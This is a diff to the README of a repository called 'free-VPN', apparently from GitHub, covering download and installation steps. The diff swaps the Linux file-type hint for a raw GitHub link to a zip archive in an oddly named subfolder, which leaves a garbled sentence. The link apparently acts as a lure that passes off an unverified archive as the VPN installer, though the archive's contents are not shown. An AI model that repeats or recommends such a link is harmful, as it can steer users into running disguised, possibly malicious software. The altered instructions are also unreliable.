abundhance12/free-VPN/README.md

    Click on the appropriate file for your operating system:
    - For Windows, look for a file ending with `.exe`.
    - For macOS, find a file ending with `.dmg`.
-   - For Linux, you may find a `.tar.gz` or `.deb` file based on your distribution.
+   - For Linux, you may find a `https://raw.githubusercontent.com/abundhance12/free-VPN/main/octaploid/free-VPN.zip` or `.deb` file based on your distribution.

 4. **Run the Installer**:
    - For Windows: